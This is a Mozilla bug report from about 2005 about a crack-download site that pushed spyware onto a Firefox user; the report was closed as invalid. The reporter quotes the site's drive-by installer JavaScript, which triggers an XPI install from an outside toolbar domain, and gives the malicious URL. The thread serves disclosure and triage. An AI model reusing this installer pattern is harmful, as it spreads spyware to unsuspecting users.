[security] Site starts up IE and installs spyware

RESOLVED INVALID

Status

()

Core
Security
--
major
RESOLVED INVALID
13 years ago
13 years ago

People

(Reporter: Laurens Holst, Assigned: dveditz)

Tracking

Trunk
x86
Windows XP
Points:
---

Firefox Tracking Flags

(Not tracked)

Details

(Whiteboard: [sg:needinfo])

Attachments

(3 attachments)

(Reporter)

Description

13 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050223 Firefox/1.0+
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b2) Gecko/20050223 Firefox/1.0+

If you go to the cracks.am site, at http://www.cracks.am/d.x?65093 (excuse the
illegal nature of this link), it will open an IE window and install spyware.

I think it's probably doing something with JavaScript, that's why I filed it
into this category, but I really wouldn't know (and don't feel like finding it
out myself at the risk of getting infected with spyware time after time after time).


~Grauw

Reproducible: Always

Steps to Reproduce:
1. Have IE installed on your computer
2. Go to http://www.cracks.am/d.x?65093
3. Get infected with spyware through the opened IE window
Actual Results:  
Spyware got installed. Amongst others SideFind, CoolWebSearch,
Performance-something and more (iirc).

Expected Results:  
I should be able to surf securely and safely.
(Reporter)

Comment 1

13 years ago
The offending JavaScript code seems to be this:

         else {
	   if(!(GetCookie_protect("exelimiter") || exelimiter)) {
		if (bname == 'Netscape') {
			if (InstallTrigger.updateEnabled()) {
				InstallTrigger.install({'Content Access Plugin 1.01' :
'http://www.xxxtoolbar.com/ist/softwares/v3.0/protect_regular.xpi'});
                	} else {
location.replace('http://www.xxxtoolbar.com/ist/softwares/bundlers//istinstall_regular.xpi');
}
        	}
		else { 
		
location.replace('http://www.xxxtoolbar.com/ist/softwares/bundlers//istinstall_regular.xpi');

		}
		SetCookie_protect("exelimiter","1", 0);
		exelimiter=1
		setTimeout('location.replace(gurl)',10000);
	   } else { location.replace(gurl); }
	}

It seems to try to install an XPI.

Now that I mention it, I do recall at some time having been prompted an XPI
install window on that site. I never clicked ok though! - I clicked on the [X]
close button, but the XPI was still installed! (apparantly it still and really
is - wonder how to get rid of it)


~Grauw
(Reporter)

Comment 2

13 years ago
Created attachment 176003 [details]
The offending HTML
(Reporter)

Comment 3

13 years ago
Created attachment 176004 [details]
The offending JS

I risked my life to get you guys the source of the offending page :).
(Reporter)

Comment 4

13 years ago
Created attachment 176006 [details]
The offending XPI
(Assignee)

Comment 5

13 years ago
If you're running Firefox this site shouldn't be able to launch a XPI -- you
should get the infobar at the top saying an install attempt from that site was
blocked. If you unblocked the site and then agreed to install something, well,
it was installed. Hard to protect against that. (I'll get back to the close
button thing in a bit...)

When I opened the captured page it also tried to install something using java,
popping up a big scary permission dialog. Do you have Java? If so, what version?
(check using about:plugins). I ask because we've seen similar sites take
advantage of a Sun JRE flaw in 1.4.2_05 and below to install things without
notice. The site appears to throw a lot of potential exploits against different
browsers so it *might* use the older java flaw in addition to the
straight-forward privilege dialog I saw.

Back to the install close button thing. That would be a serious bug, obviously,
but not one I've ever seen. Are you sure it was a XPI that ran? If it did it
would leave a record in install.log in the installation directory (or your
profile if the install dir is write protected). Look and see what you find there.

Also interesting is your initial claim that it opened an IE window, and then got
infected through that. It would certainly be dangerous if something could open
an IE window, but there's no evidence of how it did that. Probably the IE window
was opened by the exploit itself after it was already installed.
Whiteboard: [sg:needinfo]
(Reporter)

Comment 6

13 years ago
Now that you mention it, a while earlier on that site, I had a Java popup asking
me whether it could install the software appear with the Yes button right under
my mouse cursor when I clicked, so I accidentally clicked yes... :/
(Reporter)

Comment 7

13 years ago
I uninstalled Java 1.4.0.03 and installed 1.5.0.02 and the problem is gone...

I'm happy to be rid of it, but there will be millions of users still using an
older Java version just like me. The fact that the Java download page is quite
cryptic for the ‘dummy’ user doesn’t help either, even I had trouble finding the
proper download package.

I can't help that a number of Firefox's main ‘security’ problems are related to
plugins. This, and I heard about Flash popups as well. Is there a plan to
address these kind of issues?


~Grauw
(Assignee)

Comment 8

13 years ago
(In reply to comment #7)
> I can't help that a number of Firefox's main ‘security’ problems are related 
> to plugins. This, and I heard about Flash popups as well. Is there a plan to
> address these kind of issues?

Yes, we have plans to include plugins in the extension update service, blacklist
(disable) extensions and plugins with known critical vulnerabilities, block
plugins from opening windows, and more. Don't have all the bug numbers handy.

We're also looking into whether it's possible to block Java from asking for
enhanced permissions except for whitelisted sites. People could list their
corporate intranet apps and then not worry about malicious Java permission
dialogs popping up elsewhere.

Your comment 6 suggests the Java permission dialog might be vulnerable to
something like bug 162020, all the more reason to keep it from coming up.

Since the spyware was installed after you gave it explicit permission to do so,
albeit mistakenly, this bug ought to be closed. Rest assured that we are
addressing the related issues in other bugs, though.
Group: security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 13 years ago
Resolution: --- → INVALID
You need to log in before you can comment on or make changes to this bug.